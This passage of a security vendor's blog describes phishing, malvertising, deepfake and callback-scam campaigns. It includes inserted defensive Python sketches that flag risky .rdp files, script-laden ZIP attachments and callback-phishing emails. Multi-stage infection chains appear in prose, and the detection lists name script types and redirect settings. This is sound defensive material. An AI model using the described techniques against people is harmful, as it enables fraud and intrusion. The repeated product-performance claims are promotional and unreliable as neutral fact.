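    return raw.decode("utf-8-sig", errors="replace")


def parse_rdp(text):
    """Parse 'name:type:value' lines into a dict keyed by lower-cased name."""
    settings = {}
    for line in text.splitlines():
        parts = line.strip().split(":", 2)
        if len(parts) == 3 and parts[1] in ("i", "s", "b"):
            settings[parts[0].lower()] = parts[2].strip()
    return settings


def host_of(address):
    address = address.strip()
    if address.startswith("["):            # [IPv6]:port
        return address[1:].split("]", 1)[0]
    if address.count(":") == 1:            # host:port or IPv4:port
        return address.split(":", 1)[0]
    return address                         # bare host, IPv4 or IPv6


def is_external(address):
    host = host_of(address).lower()
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
        # Hostname: single-label names and listed suffixes count as internal.
        return "." in host and not host.endswith(INTERNAL_SUFFIXES)


def inspect_rdp(raw):
    s = parse_rdp(decode_rdp(raw))
    target = s.get("full address", "")
    redirects = [label for name, label in REDIRECT_FLAGS.items() if s.get(name) == "1"]
    redirects += [f"{label} ({s[name]})" for name, label in REDIRECT_LISTS.items() if s.get(name)]
    external = bool(target) and is_external(target)
    if external and redirects:
        verdict = "block"
    elif external or redirects:
        verdict = "review"
    else:
        verdict = "allow"
    # A signature identifies the signer; it says nothing about the target host.
    return {"target": target, "external": external, "redirects": redirects,
            "signed": "signature" in s, "verdict": verdict}


# Constructed sample files (placeholders, not taken from the campaign).
SUSPICIOUS_SAMPLE = "\r\n".join([
    "full address:s:gateway.vendor-portal.example",
    "drivestoredirect:s:*",
    "redirectclipboard:i:1",
    "redirectprinters:i:1",
    "redirectsmartcards:i:1",
    "signature:s:CONSTRUCTED-PLACEHOLDER",
]).encode("utf-16")
INTERNAL_SAMPLE = b"full address:s:10.20.30.40:3389\nredirectclipboard:i:0\n"

if __name__ == "__main__":
    print(inspect_rdp(SUSPICIOUS_SAMPLE))
    print(inspect_rdp(INTERNAL_SAMPLE))
```

This complements, rather than replaces, blocking .rdp attachments at the mail gateway as recommended above.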
An anti-phishing solution should also be considered for augmenting the protection provided through Microsoft Defender and EOP for Microsoft 365. PhishTitan from TitanHQ has been shown to improve protection and block threats that Microsoft’s anti-phishing solution fails to detect, augmenting rather than replacing the protection provided by EOP and Defender. It is also important to provide security awareness training to the workforce and ensure that spear phishing and RDP file attachments are included in the training. Also, consider conducting spear phishing simulations.
by titanadmin | Oct 30, 2024 | Internet Security |
A new malvertising campaign has been identified that abuses the Meta advertising platform to deliver an information stealer malware variant called SYS01 Stealer. Similar to other malvertising campaigns, popular brands are impersonated to trick users into downloading the information stealer in the belief they are installing legitimate software. In this campaign, the impersonated brands include popular software tools that are commonly used by businesses, including the video and imaging editing tools CapCut, Adobe Photoshop, and Canva, as well as productivity tools such as Office 365, instant messaging platforms such as Telegram, VPN providers such as Express VPN, and a host of other software products and services to ensure a wide reach, including video games and streaming services.
The adverts claim that these software solutions, games, and services are available free of charge, which is a red flag as the genuine products and services usually require a purchase or subscription. The advertisements are published via hijacked Facebook business accounts, which according to an analysis by Bitdefender, have been used to create thousands of ads on the platform, many of which remain active for months. If a user interacts with one of the adverts, they are directed to sites hosted on Google Sites or True Hosting. Those sites impersonate trusted brands and offer the application indicated in the initial ad. If the user is tricked and progresses to a download, a zip file is delivered that contains an executable file that sideloads a malicious DLL, which launches the infection process.
The DLL will run PowerShell commands that will prevent the malware from executing in sandboxes and will prepare the environment for the malware to be installed, including disabling security solutions to ensure the malware is not detected, with persistence maintained through scheduled tasks. Some identified samples include an Electron application with JavaScript code embedded that drops and executes the malware.
The cybercriminals behind the campaign respond to detections of the malware by security solutions and change the code when the malware starts to be blocked, with the new variant rapidly pushed out via Facebook ads. The information stealer primarily targets Facebook business accounts and steals credentials allowing those accounts to be hijacked. Personal data is stolen, and the accounts are used to launch more malicious ads. Since legitimate Facebook business accounts are used, the attackers can launch malicious ads at scale without arousing suspicion. This malvertising campaign stands out due to its scale, with around 100 malicious domains currently used for malware distribution and command and control operations.
Businesses should take steps to ensure they are protected by using a web filter to block the malicious domains used to distribute the malware, block access to Facebook for employees, and prevent malware downloads from the Internet. Since business Facebook accounts are targeted, it is important to ensure that 2-factor authentication is enabled in the event of credentials being compromised, and business Facebook accounts should be monitored for unauthorized access. Business users should not install any software unless it comes from an official source, which should be reinforced through security awareness training.
TitanHQ has developed an easy-to-use web filter called WebTitan that is constantly updated with threat intelligence to block access to malicious sites as soon as they are discovered. WebTitan can be configured to block certain file downloads from the Internet by extension to reduce the risk of malware infections and control shadow IT, and WebTitan makes it easy for businesses to enhance productivity while improving security by blocking access to known distractions such as social media platforms and video streaming sites. WebTitan provides real-time protection against clicks in phishing emails by preventing a click from launching a malicious website and the solution can be used to protect all users on the network as well as off-network users on portable devices through the WebTitan on-the-go roaming agent. For more information about improving your defenses against malware delivered via the internet and malvertising campaigns, give the TitanHQ team a call today.
by titanadmin | Oct 30, 2024 | Phishing & Email Spam, Security Awareness |
Several new campaigns have been detected in recent weeks that use diverse tactics to trick people into disclosing sensitive information and installing malware.
Cybercriminals Target Crypto Wallets via Webflow Sites
Webflow is a software-as-a-service company that businesses can use to accelerate website development. The platform makes it easier to create websites and web pages, simplifying and eliminating many of the complex tasks to speed up website creation. Cybercriminals have taken advantage of the platform and are using it to rapidly spin up phishing pages and create pages to redirect users to malicious sites. One of the main advantages of Webflow compared to alternative platforms is the ease of creating custom subdomains, which can help phishers make their phishing pages more realistic. Subdomains can be created to mimic the login pages that they are impersonating, increasing the probability that individuals will be fooled into disclosing their credentials.
The number of detected phishing pages on Webflow has increased sharply, especially for crypto scams. One of the campaigns impersonated the Trezor hardware wallet. Since the subdomain can be customized to make the phishing page appear official, and screenshots of the actual Trezor site are used, these phishing pages can be very convincing. In these campaigns, the aim is to steal the seed phrases of the victim to allow the threat actor to access cryptocurrency wallets and transfer the funds. In one campaign, when the seed phrase is disclosed, the user is told their account has been suspended for unauthorized activity and they are told to launch a chat service for support. The chat service is manned by the threat actor who keeps the victim engaged while their wallet is emptied.
Hackers Use Deepfakes to Target Finance Professionals
The cost of artificial intelligence (AI) solutions is falling and cybercriminals are taking advantage. AI is increasingly being used to manipulate images, audio, and video recordings to make their scams more convincing. These deepfakes are realistic and more effective at tricking individuals into making fraudulent wire transfers than business email compromise scams, as they include deepfake videos of the person being spoofed. Cybercriminals use AI tools to create deepfakes from legitimate video presentations and webinars, impersonating an executive such as the CEO or CFO in an attack on finance team members. The aim is to trick the employees into making a wire transfer. Earlier this year, the engineering group Arup was targeted using a deepfake of the company CFO, and $25 million was transferred to the scammers in transfers to five different bank accounts.
Vendors are often spoofed in deepfake scams to trick their clients into wiring payments to attacker-controlled bank accounts. A recent survey by Medius revealed that 53% of finance professionals in the UK and US had experienced at least one attempted deepfake scam. These scams may occur over the phone, with the deepfake occurring in real-time, and there have been many cases of deepfake impersonations over video conferencing platforms such as Microsoft Teams and Zoom.
North Korean Hackers Target Developers with Fake Job Interviews
The North Korean hacking team, Lazarus Group, is known to use diverse tactics in its attacks. The group has now been observed infiltrating business networks by obtaining positions as IT workers. According to Mandiant, dozens of Fortune 100 companies have been tricked into hiring workers from North Korea, who steal corporate data after being hired. One UK firm discovered they had been duped 4 months after employing an IT worker who was actually based in North Korea. The IT worker used the network access provided to siphon off sensitive data, and when the worker was sacked for poor performance, demanded a ransom to return the stolen data. Researchers believe the data was provided to North Korea.
The Lazarus Group has also been targeting developers through fake interviews. The group hosts fake coding assessments on legitimate repositories such as GitHub and hides malicious code in those repositories, especially in Python files. The developers are tricked into downloading the code and are tasked with finding and fixing a bug but will inadvertently execute the malicious code regardless of whether they complete the assessment. The hackers often pose as legitimate companies in the financial services sector.
Legitimate File-Hosting Services Used for Phishing Attacks and Malware Distribution
One of the ways that cybercriminals attempt to bypass filtering mechanisms is to use legitimate hosting services for phishing and malware delivery. Dropbox, OneDrive, Google Drive, and SharePoint are all commonly used by cybercriminals. These services are used by businesses for storing and sharing files and for collaboration, so these services are often trusted. They are also often trusted by security solutions. Tactics commonly used include sharing links to files hosted on these services via phishing emails, often restricting access to the files to prevent detection by security solutions. For instance, the user is required to be logged in to access the file. Files may be hosted in view-only mode to avoid detection by security solutions, with social engineering techniques used to fool the user into downloading the files.
Cybercriminals are constantly evolving their tactics to phish for credentials, distribute malware, and gain unauthorized access to sensitive data. Businesses need to adopt a defense-in-depth approach to security, adding several layers to their defenses to combat new threats. These measures include an advanced spam filtering service with machine learning capabilities and email sandboxing, a web filter for blocking access to malicious websites and preventing malware downloads from the Internet, anti-phishing solutions for Microsoft 365 environments to block the threats that Microsoft often fails to detect, and comprehensive security awareness training for the workforce.
Cybercriminals will continue to evolve their tactics, so security solutions should also be able to evolve and be capable of detecting zero-day threats. With TitanHQ as your security partner, you will be well protected against these rapidly changing tactics. Give the TitanHQ team a call today to find out more about improving your technical and human defenses against these threats.
by titanadmin | Oct 28, 2024 | Phishing & Email Spam |
For many years, cybercriminals have favored Office documents for distributing malware. These documents are familiar to most workers and are likely to be opened because they are so familiar and used so often. The documents may contain hyperlinks to malicious websites where malware is downloaded, but the easiest method is automating the delivery of malware using a malicious macro. If that macro is allowed to run, the infection process will be triggered.
Microsoft has helped to make documents and spreadsheets more secure by disabling macros by default if they have been delivered via the Internet, and increasing numbers of companies are providing workforce security awareness training and instructing their employees not to enable content on Office documents delivered via the Internet. It has become much harder for cybercriminals to distribute malware using these file formats, so they have turned to scripting languages for malware delivery.
The use of VBScript and JavaScript in malware distribution campaigns has been increasing, with these executable files often hidden from security solutions by adding them to archive files. The scripts used in campaigns are snippets of code that include command sequences, which automate the downloading and execution of malware, often only operating within the system’s memory to avoid detection. The user is likely to be unaware that malware installation has been triggered.
For example, in one campaign, a malicious VBS script was hidden in an archive file to evade email security defenses. If extracted and executed, the script executes PowerShell commands, which can be difficult for security solutions to identify as malicious. PowerShell triggered the BitsTransfer utility to fetch another PowerShell script, which downloaded and decoded shellcode, which in turn loaded a second shellcode that used the Windows wab.exe utility to download an encrypted payload. The shellcode decrypted and incorporated the payload into wab.exe, turning it into the remote access trojan, Remcos RAT. This multi-stage infection process used living-off-the-land techniques to evade security solutions, and it all started with an email that used social engineering to trick the recipient into executing the script.
Using this attack as an example, there are opportunities for identifying the email for what it really is. Businesses need to ensure they have advanced email security defenses in place such as an advanced spam filter for Office 365 or a machine-learning/AI-driven spam filtering service. These services perform standard checks of inbound email, such as anti-spoofing and reputation checks on the sender, Bayesian analysis to determine whether the email is likely to be spam, but also machine learning checks, where the inbound message is compared against the emails typically received by a business and is flagged if any irregularities are found.
Anti-virus scans are useful for detecting malware, but these checks can often be evaded by adding malicious scripts to archive files, and the multi-stage process involved in infection is often sufficient to defeat signature-based malware detection. An email security solution therefore needs to also use email sandboxing. All attachments capable of being used for malicious purposes are scanned with an anti-virus engine and are then sent to the sandbox for deep analysis. Malware sandboxing for email is important, as it detects malware not by its signature, but by its behavior, which is vital for identifying script-based malware delivery. While there are sandboxing message delays, it prevents many costly malware infections.
SpamTitan, TitanHQ’s cloud-based anti-spam service, incorporates these checks to provide exceptional malware detection. In recent independent tests, SpamTitan blocked 100% of malware and had a 99.99% phishing catch rate and a 0.000% false positive rate. In addition to using an advanced spam filter, businesses can further reduce risk by blocking delivery of the 50 or so archive file formats supported by Windows if they are not used by the business.
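Where archives cannot be blocked outright, an attachment policy can at least look inside them for the script types this post describes. The following Python sketch is an added example, not code from the original article or from SpamTitan; it handles ZIP only, and the extension lists, nesting and size limits, and the sample archive are constructed assumptions.

```python
import io
import zipfile
from pathlib import PurePosixPath

# Assumption: script and executable types a business rarely needs by email.
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta",
               ".ps1", ".bat", ".cmd", ".lnk", ".scr", ".exe"}
# Document-style extensions used to disguise a script (invoice.pdf.vbs).
DECOY_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}
MAX_DEPTH = 3                        # how many archive levels to open
MAX_NESTED_BYTES = 20 * 1024 * 1024  # refuse to unpack larger nested archives


def scan_zip(data, depth=0, prefix=""):
    """Return (path, reason) findings for a ZIP attachment held in memory."""
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return [(prefix or "<attachment>", "not a readable ZIP archive")]
    findings = []
    with archive:
        for info in archive.infolist():
            if info.is_dir():
                continue
            path = prefix + info.filename
            suffixes = [s.lower() for s in PurePosixPath(info.filename).suffixes]
            last = suffixes[-1] if suffixes else ""
            if info.flag_bits & 0x1:
                # Bit 0 of the general-purpose flags marks an encrypted member.
                findings.append((path, "encrypted member, content cannot be scanned"))
            elif last in SCRIPT_EXTS:
                reason = "script or executable file"
                if len(suffixes) > 1 and suffixes[-2] in DECOY_EXTS:
                    reason += " with a document double extension"
                findings.append((path, reason))
            elif last == ".zip":
                if depth + 1 >= MAX_DEPTH:
                    findings.append((path, "archive nesting too deep to inspect"))
                elif info.file_size > MAX_NESTED_BYTES:
                    findings.append((path, "nested archive too large to inspect"))
                else:
                    findings += scan_zip(archive.read(info), depth + 1, path + "!/")
    return findings


def should_quarantine(data):
    """Quarantine when anything inside the archive is flagged."""
    return bool(scan_zip(data))


def build_sample():
    """Constructed sample: a placeholder .vbs hidden one archive level down."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("invoice.pdf.vbs", "' constructed placeholder, not a real script\n")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("readme.txt", "constructed sample")
        z.writestr("docs/order.zip", inner.getvalue())
    return outer.getvalue()


def build_clean():
    """Constructed sample containing only a document-type file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("report.xlsx", "constructed placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    for path, reason in scan_zip(build_sample()):
        print(f"{path}: {reason}")
```

Extension checks catch only what the name gives away, which is why the post pairs attachment filtering with sandboxing for behavior-based detection.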
It is also important to provide continuous security awareness training to the workforce to improve awareness of threats and the new tactics, techniques, and procedures being used by threat actors to trick individuals into providing them with network access. This is easily done with TitanHQ’s SafeTitan security awareness training platform solution, especially when combined with phishing simulations.
Cyberattacks targeting individuals are increasing in sophistication and standard security defenses are often evaded. To find out more about improving your defenses against sophisticated phishing, malware, and business email compromise threats, give the TitanHQ team a call. Improving your defenses is likely to be much cheaper than you think.
by titanadmin | Oct 26, 2024 | Security Awareness |
Managed service providers can implement security solutions to protect their clients from phishing, social engineering, and business email compromise attacks but if a malicious email manages to bypass those defenses, it could easily result in hackers gaining a foothold in the network, resulting in a highly disruptive and costly cyberattack and data breach. To improve defenses against phishing, managed service providers should offer their clients security awareness training to manage human risk, and now TitanHQ can offer a security awareness training (SAT) solution that allows them to do that with ease.
This month, TitanHQ launched its Security Awareness Training (SAT) solution for MSPs. The solution has been specifically created to be used by MSPs and allows them to provide affordable, scalable training with minimal setup. The training platform has now been integrated with TitanHQ’s MSP cybersecurity platform and is ready for MSPs to use. In contrast to many SAT solutions that only provide standard cybersecurity training, TitanHQ’s SAT solution integrates advanced phishing simulation with behavior-focused training that is fun and engaging for participants. The solution delivers maximum value to MSPs and can be rapidly set up, allowing them to roll out training programs to new clients with just a few clicks. There is no need to spend hours assigning training content to new customers, as it is possible to select multiple customers and rapidly spin up training courses that can be rapidly deployed for individuals or groups of customers in the future.
The AI-driven training platform allows training content to be tailored to individual employees to meet their training needs, personalizing the training experience. The platform includes more than 80 videos, training sessions, and webinars to improve awareness and help create a security culture. MSPs are provided with monthly reports on the progress that is being made by individual employees and they are provided with actionable insights.
The platform includes a phishing simulator that allows MSPs to conduct real-time phishing simulations based on a huge variety of templates (1,800+) covering all types of phishing and other attack scenarios, and the content is updated regularly to include the latest tactics, techniques, and procedures used by cybercriminals in real-world phishing campaigns. MSPs can easily pre-configure phishing simulations and training campaigns to roll out to new clients as they are onboarded, and the MSP dashboard provides a view of quick actions and live analytics all in one place.
The training platform can deliver reactive training in response to user behavior, where users in need of training are automatically enrolled and delivered relevant training content. MSPs can use the platform to conduct cyber awareness knowledge checks to identify areas where individuals need training, verify understanding of the training material, and retest employees over time to ensure they have not forgotten the material from previous training sessions. The training material covers the cyber threats that employees are likely to encounter such as phishing, social engineering, business email compromise, and malware, but also in-person threats such as physical security, ensuring they receive comprehensive training that covers all the bases.
If you have yet to start offering security awareness training to your clients, or if you already offer training but require a more comprehensive and easier-to-use training platform, give the TitanHQ team a call. Product demonstrations can be arranged on request to show you just how easy the platform is to use.
“Our integrated cybersecurity platform delivers maximum value to MSPs, offering a quicker time-to-market, reduced set-up requirements combined with real-world, practical security awareness training & phishing simulations. TitanHQ delivers that seamlessly, allowing MSPs to offer comprehensive SAT to their customers in just a few clicks,” said TitanHQ CEO, Ronan Kavanagh.
by titanadmin | Oct 26, 2024 | Phishing & Email Spam |
The purpose of phishing attacks is usually to steal credentials to gain unauthorized access to accounts. If an employee falls for a phishing attack and their credentials are obtained, the attacker can gain access to that user’s account and any data contained therein. That access can be all that is required for the threat actor to achieve a much more extensive compromise.
Oftentimes, a threat actor conducts a more extensive phishing campaign on multiple employees at the same organization. These phishing attacks can be harder to spot as they have been tailored to that specific organization. These attacks usually spoof an internal department with the emails seemingly sent from a legitimate internal email account. The emails may address each individual by name, or appear to be broadcast messages to staff members. One successful campaign was identified by the Office of Information Technology at Boise State University, although not before several employees responded to the emails and disclosed their credentials. In this campaign, the emails were addressed to “Dear Staff,” and appeared to have been sent from the postmaster account by “Health Services,” purporting to be an update on workplace safety. The emails had the subject line “Workplace Safety: Updates on Recent Health Developments,” with a similar campaign indicating a campylobacter infection had been reported to the health department.
In the message, recipients were advised about a health matter involving a member of staff and told to contact the Health Service department if they believed they had any contact with the unnamed worker. To find out if they had any contact with the worker, recipients had to click the link. The link directed the user to a fraudulent login page on an external website, where they were required to enter their credentials. The login page had been created to look like a legitimate Boise State University page; it captured credentials and used a Duo Security notification to authorize access to the user’s account.
These targeted campaigns are now common, especially at large organizations where it is possible to compromise a significant number of accounts and it is worth the attacker’s time to develop a targeted campaign. Another attack was recently identified by the state of Massachusetts. The attacker created a fake website closely resembling the HR/CMS Employee Self-Service Time and Attendance (SSTA) system, which is used for payroll. Employees were tricked into visiting the portal and were prompted to enter their credentials, which the attacker used to access their personal and direct deposit information. In this case, the aim of the attack appeared to be to change direct deposit information to have the employees’ wages paid into the attacker’s account. Several employees were fooled by the scam, although in this case the attack was detected promptly and the SSTA system was disabled to prevent fraudulent transfers.
A different type of campaign recently targeted multiple employees via email, although the aim of the attack was to grant the threat actor access to the user’s device by convincing them to install the legitimate remote access solution, AnyDesk. The threat actor, the Black Basta ransomware group, had obtained employee email addresses and bombarded them with spam emails, having signed them up for newsletters via multiple websites. The aim was to create a legitimate reason for the next phase of the attack, which occurred via the telephone, although the group has also been observed using Microsoft Teams to make contact. The threat actor posed as the company’s IT help desk and offered assistance resolving the spam problem they created, which involved downloading AnyDesk and granting access to their device. During the session, tools were installed to provide persistent access. The threat actor then moved laterally within the network and extensively deployed ransomware.
These attacks use social engineering to exploit human weaknesses. In each of these attacks, multiple red flags should have been spotted revealing these social engineering attempts for what they are, but more than one employee failed to spot them. It is important to provide security awareness training to the workforce to raise awareness of phishing and social engineering threats, and for training to be provided regularly. Training should include the latest tactics used by threat actors to breach networks, including phishing attacks, fake tech support calls, malicious websites, smishing, and vishing attacks.
A phishing simulator should be used to send realistic but fake phishing emails internally to identify employees who fail to spot the red flags. They can then receive additional training relative to the simulation they failed. By providing regular security awareness training and conducting phishing simulations, employers can develop a security culture. While it may not be possible to prevent all employees from responding to a threat, the severity of any compromise can be limited. With TitanHQ’s SafeTitan solution, it is easy to create and automate tailored training courses and phishing simulations that have been shown to be highly effective at reducing susceptibility to phishing and other threats.
Since threat actors most commonly target employees via email, it is important to have robust email defenses to prevent the threats from reaching employees. Advanced anti-spam services such as SpamTitan incorporate a wide range of threat detection methods to block more threats, including reputation checks, extensive message analysis, machine-learning-based detection, antivirus scans, and email sandboxing for malware detection. SpamTitan has been shown to block more than 99.99% of phishing threats and 100% of malware.
by titanadmin | Oct 24, 2024 | Phishing & Email Spam |
Phishing is one of the most effective methods used by cyber actors to gain initial access to protected networks. Phishing tactics are evolving and TOAD attacks now pose a significant threat to businesses. TOAD stands for Telephone-Oriented Attack Delivery and is a relatively new and dangerous form of phishing that involves a telephone call, although there are often several different elements to a TOAD attack which may include initial contact via email, SMS messages, or instant messaging services.
TOAD attacks often start with an information-gathering phase, where the attacker obtains personal information about individuals that can then be targeted. That information may only be a mobile phone number or an email address, although further information is required to conduct some types of TOAD attacks.
One of the most common types of TOAD attacks is callback phishing. The attacker impersonates a trusted entity in an email and makes a seemingly legitimate request to make contact. There is a sense of urgency to get the targeted individual to take prompt action. Rather than use a hyperlink in the message to direct the user to a website, the next phase of the attack takes place over the telephone or a VOIP-based service such as WhatsApp. A phone number is included that must be called to resolve a problem.
If the call is made, the threat actor answers and during the call, trust is built with the caller and the threat actor makes their request. That could be an instruction to visit a website where sensitive information must be entered or a file must be downloaded. That file download leads to a malware infection.
Several TOAD attacks have involved the installation of legitimate remote access software. One campaign involved initial contact via email about an expensive subscription that was about to be renewed, which required a call to cancel. The threat actor convinces the user to download remote access software, which they are told is necessary to prevent the charge from being applied, for instance to fully remove the software solution from the user’s device.
The user is convinced to give the threat actor access to their device through the software and the threat actor keeps the person on the line while they install malware or perform other malicious actions, reassuring them if they get suspicious. Other scams involve initial contact about a fictitious purchase that has been made, or a bank scam, where an email impersonates a bank and warns the victim that an account has been opened in their name or a large charge is pending. These attacks result in the victim providing the threat actor with the information they need to access their account.
TOAD attacks often involve the impersonation of a trusted individual, who may be a colleague, client, or even a family member. Since information is gathered before the scam begins, when the call is made, the threat actor can provide that information to the victim to convince them that they are who they claim to be. That information may have been purchased on the dark web or obtained in a previous data breach. For instance, following a healthcare data breach, the healthcare provider may be impersonated, and the attacker can provide medical information in their possession to convince the victim that they work at the hospital.
The use of AI tools makes these scams even more convincing. Deepfakes are used, where a person’s voice is mimicked, or video images are manipulated on video conferencing platforms. Deepfakes were used in a scam on an executive in Hong Kong, who was convinced to transfer around £20 million in company funds to the attacker’s account, believing they were communicating with a trusted individual via a video conferencing platform.
TOAD attacks may be solely conducted over the phone, where the attacker uses call spoofing to manipulate the caller ID to make it appear that the call is coming from a known and previously verified number. Other methods may be used to convince the victim that the reason for the call is genuine, such as conducting a denial-of-service attack to disrupt a service or device to convince the user that there is an urgent IT problem that needs to be resolved. TOAD attacks are increasing because standard phishing attacks on businesses are becoming harder to pull off due to email security solutions, multifactor authentication, and improved user awareness about scam messages.
Unfortunately, there is no single cybersecurity solution or method that can combat these threats. A comprehensive strategy is required that combines technical measures, security awareness training and administrative controls. Advanced anti-spam software with machine learning and AI-based detection can identify the emails that are used for initial contact. These advanced detection capabilities are needed because the initial emails often contain no malicious content, other than a phone number. SpamTitan, TitanHQ’s cloud-based anti-spam service, can detect these initial emails through reputation checks on the sender’s IP address, email account, and domain, and machine learning is used to analyze the message content, including comparing emails against the typical messages received by a business.
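The callback-phishing traits described above (a phone number in place of any link, urgency, and a renewal, purchase, or bank lure) can be turned into a simple triage heuristic. The following Python sketch is an added example, not SpamTitan's detection logic; the word lists, the flagging rule, the brand name "Norvane", and both sample messages are constructed assumptions.

```python
import re
from email import message_from_string, policy
from email.utils import parseaddr

# Heuristic patterns; word lists and the flagging rule are illustrative assumptions.
PHONE_RE = re.compile(
    r"(?<!\d)(?:\+?\d{1,3}[\s.-]?)?\(?\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4}(?!\d)")
CALL_RE = re.compile(r"\b(call|phone|dial)\b", re.I)
URL_RE = re.compile(r"https?://|www\.", re.I)
# Lure themes the article names: renewals, fictitious purchases, bank alerts.
LURE_RE = re.compile(
    r"\b(subscription|renew(?:al|ed)?|invoice|purchase|charged?|refund|"
    r"account (?:has been |was )?opened)\b", re.I)
URGENCY_RE = re.compile(
    r"\b(immediately|today|urgent(?:ly)?|to cancel|within \d+ hours?)\b", re.I)
ORG_RE = re.compile(r"\b(billing|support|security|team|bank|services?)\b", re.I)
WEBMAIL = {"gmail.com", "yahoo.com", "aol.com", "outlook.com"}


def score_callback_phish(raw):
    """Return (flagged, signals) for one RFC 5322 message given as text."""
    msg = message_from_string(raw, policy=policy.default)
    part = msg.get_body(preferencelist=("plain",))
    text = str(msg["Subject"] or "") + "\n" + (part.get_content() if part else "")
    display, addr = parseaddr(str(msg["From"] or ""))
    domain = addr.rpartition("@")[2].lower()

    signals = []
    if PHONE_RE.search(text) and CALL_RE.search(text):
        signals.append("phone_call_to_action")
    if not URL_RE.search(text):
        signals.append("no_link")
    if LURE_RE.search(text):
        signals.append("lure_theme")
    if URGENCY_RE.search(text):
        signals.append("urgency")
    if domain in WEBMAIL and ORG_RE.search(display):
        signals.append("org_name_from_webmail")

    # A phone number in place of any link is the defining trait; require one
    # more corroborating signal so ordinary signatures are not flagged.
    flagged = {"phone_call_to_action", "no_link"} <= set(signals) and len(signals) >= 3
    return flagged, signals


# Constructed sample: subscription-renewal lure with a callback number, no link.
SAMPLE_CALLBACK = """\
From: "Norvane Billing Team" <norvane.billing@gmail.com>
To: user@example.com
Subject: Your subscription renewal - invoice 48213

Your annual subscription has been renewed and $389.99 will be charged today.
To cancel, call our billing desk immediately on +1 (555) 010-0199.
"""

# Constructed sample: routine internal mail with a link and a phone number.
SAMPLE_BENIGN = """\
From: "Dana Reyes" <dana.reyes@example.com>
To: team@example.com
Subject: Notes from Tuesday's planning meeting

Hi all, the notes are at https://intranet.example.com/notes/planning.
Call me on 555-010-0142 if anything is missing.
"""

if __name__ == "__main__":
    for name, raw in (("callback", SAMPLE_CALLBACK), ("benign", SAMPLE_BENIGN)):
        print(name, score_callback_phish(raw))
```

A rule like this is only a triage aid for quarantined or user-reported mail; it complements, and does not replace, the reputation and machine-learning checks described above.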
WebTitan is a cloud-based DNS filter that is used to control the web content that users can access. WebTitan will block access to known malicious sites and can be configured to prevent certain file types from being downloaded from the internet, such as those commonly used to install malware, unauthorized apps, and remote access solutions.
Regular security awareness training is a must. All members of the workforce should be provided with regular security awareness training and TOAD attacks should feature in the training content. SafeTitan, TitanHQ’s security awareness training platform and phishing simulator, makes it easy for businesses to create and automate training courses for the workforce. Employees should be trained in how to identify a TOAD attack and told not to trust caller ID alone, to avoid clicking links in emails and SMS messages, to be vigilant when receiving or making calls, to report any suspicious activity, and to immediately end a call if something does not seem right.
by titanadmin | Oct 20, 2024 | Industry News, Network Security, Security Awareness |
Schools and higher educational institutions have long been a target for cybercriminals and attacks are on the increase. Educational institutions store large amounts of sensitive data on their students, which can include health and financial data – information that can be easily monetized. The data can be sold on the dark web to identity thieves and can be used for a range of fraudulent purposes.
Like the healthcare sector, which is also extensively targeted by malicious actors, educational institutions often have a complex mix of modern and legacy IT systems and securing those systems can be a challenge while ensuring they remain accessible to authorized individuals, especially when there is often a limited budget for cybersecurity. There are also non-technical vulnerabilities. Schools employ a diverse range of individuals including teaching and support staff and networks are accessed by students of a range of ages. Cybersecurity awareness can vary greatly among network users. The combination of vulnerabilities means the sector is relatively easy to attack.
According to a recent report from Microsoft, schools in the United States are being used by malicious actors to test their tactics, techniques, and procedures. Microsoft Threat Intelligence data indicates education is the third-most targeted sector in the United States and attacks are also increasing in the United Kingdom, especially higher education institutions where 43% of surveyed institutions said they experience a cyberattack or data breach at least weekly. In Q2, 2024, the education sector was also on a par with healthcare, information technology, telecommunications, consumer retail, and transportation sectors for ransomware attacks, each accounting for 11% of attacks in the quarter.
It is not only cybercriminal groups that target the education sector. Several state-sponsored hacking groups are targeting universities to gain access to connections and steal IP. Universities are commonly engaged in cutting-edge research and often work closely with government agencies. Nation state hacking groups target intellectual property to further research in their native countries, and it can be a lot easier to target individuals in the education sector and use their accounts to pivot to attack their contacts, which may include high-level individuals in a range of private sector industries, as well as the defense sector.
Microsoft has tracked attacks on the education sector by Iranian threat groups such as Mint Sandstorm and Peach Sandstorm, both of which conduct sophisticated phishing and social engineering attacks. North Korean hacking groups also target the U.S. education sector, with groups tracked by Microsoft as Emerald Sleet and Moonstone Sleet using novel techniques to install malware to gain access to the networks of educational institutions.
While vulnerabilities in software and operating systems can be exploited, phishing and social engineering attacks are much more commonly used to steal credentials and install malware, so it is essential that educational institutions have robust defenses against these types of attacks.
Advanced anti-spam software is essential for blocking phishing and social engineering attacks. In independent tests, SpamTitan has been shown to block 100% of malware thanks to twin antivirus engines and email sandboxing, and 99.99% of spam and phishing emails thanks to a barrage of checks and tests, including machine learning and AI-driven detection.
Many threats are delivered via the Internet, so it is vital to block access to malicious sites. WebTitan is a DNS-based web filtering solution for educational institutions that blocks access to malicious sites, prevents malware downloads from the Internet, and is used by schools to restrict the types of websites that staff and students can access to better protect students from harmful web content and comply with government regulations.
Security awareness training is also important to improve human defenses. TitanHQ’s SafeTitan training platform allows educational institutions to easily create training courses for staff and students, and test knowledge of social engineering and phishing through an easy-to-use phishing simulator.
Cybercriminals and nation state actors are likely to continue to target the education sector, so it is important to have the right defenses in place. Give the TitanHQ team a call today to find out more about improving your defenses against increasingly sophisticated cyber threats.